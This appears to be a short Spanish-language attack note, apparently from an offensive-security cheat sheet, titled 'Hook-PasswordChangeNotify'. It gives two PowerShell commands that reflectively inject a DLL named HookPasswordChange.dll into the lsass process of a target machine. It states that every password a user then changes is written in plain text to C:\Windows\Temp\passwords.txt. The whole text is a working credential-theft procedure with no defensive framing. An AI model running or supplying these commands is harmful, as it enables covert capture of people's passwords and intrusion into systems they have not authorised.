Hook-PasswordChangeNotify
- Ejecuta el siguiente comando en PowerShell:
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
- Cuando un usuario de la máquina objetivo modifica su contraseña, la nueva contraseña se escribirá en C:\Windows\Temp\passwords.txt